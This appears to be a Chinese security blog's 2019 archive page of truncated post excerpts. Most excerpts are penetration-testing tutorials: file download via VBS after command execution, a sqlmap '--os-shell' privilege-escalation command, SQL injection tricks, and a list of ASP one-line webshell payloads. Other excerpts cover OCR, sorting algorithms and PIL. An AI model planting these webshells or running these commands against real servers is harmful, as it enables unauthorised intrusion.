07 2019 档案
摘要:我们在做渗透测试的时候会经常遇到存在命令执行的Windows服务器,而且不能上传shell,唯一的入口就是命令执行,这种情况下,我们需要向服务器上传一个大一点的工具,如何实现,这就是本文章主要的内容。 利用http协议下载文件 利用vbs下载 将下面的代码保存为test.vbs 执行如下语句: cs
阅读全文
摘要:"参考" "参考" 安装 windows: Linux: 使用 scan( host , port , args ) 方法 :以指定方式扫描指定主机或网段的指定端口 host : 要扫描的主机或网段,可以是一个单独的ip:192.168.10.10 ;也可以是一个小范围网段:192.168.10.1
阅读全文
摘要:windows提权 1.通过sqlmap连接mysql获取shell (1)直接连接数据库 sqlmap.py -d “mysql://root:123456@127.0.0.1:3306/mysql”–os-shell (2)通过选择32位或者64位操作系统,获取webshell,执行 bash
阅读全文
摘要:注入总结 参考链接 MYSQL 有时使用union注入时,会出现一些乱码,如下解决 convert(@@version using latin1) unhex(hex(@@version)) 注释符 井号(#) 双横线 (-- )后面要加一个空格 /**/ 局部注释 %00 直接截断字符串 `反引号
阅读全文
摘要:一句话木马 asp <%execute(request("kxc"))%> <%eval request ("pass")%> <%eval request(chr(35))%> <%executerequest("YouPass")%> <%eval(request(“1″)):response.
阅读全文
摘要:信息收集 1.IP信息 17CE 看是否存在cdn 存在的话,查找真实ip 从国外去访问,查看ip信息 去掉www,然后查看ip信息 2.旁站信息 webscan.cc 站长之家 3.C段信息 webscan.cc 站长之家 4.子域名信息 layer子域名挖掘机 subdomain 5.端口信息
阅读全文
摘要:正确使用方法 1.tesseract orc安装 "tesseract ocr setup 3.05.00dev.exe下载" 2.pytesseract 3.设置 tesseract orc路径 将 添加到系统路径(路径因安装过程而异) 修改pytesseract.py文件 tesseract_c
阅读全文
摘要:排序算法比较 比较排序和非比较排序 常见的排序算法都是比较排序,非比较排序包括计数排序、桶排序和基数排序,非比较排序对数据有要求,因为数据本身包含了定位特征,所有才能不通过比较来确定元素的位置。 比较排序的时间复杂度通常为O(n2)或者O(nlogn),比较排序的时间复杂度下界就是O(nlo
阅读全文
摘要:引言 定义:算法就是按照一系列有限的步骤正确解决问题的办法 属性: 正确:就是可以正确的求解问题 快速:就是时间复杂度要尽量小 有穷性:要在有限个步骤解决问题 简洁 通用 渐进分析法为什么可以做到与算法运行硬件环境无关? 算法分析时往往假设输入规模n足够大,甚至趋近于无穷大。这样的假设,意味着我们关
阅读全文
摘要:Image模块 Image模块是在Python PIL图像处理中常见的模块,对图像进行基础操作的功能基本都包含于此模块内。如open、save、conver、show…等功能。 open类 要从文件加载图像,使用 open() 函数, 在 Image 模块: from PIL import Imag
阅读全文
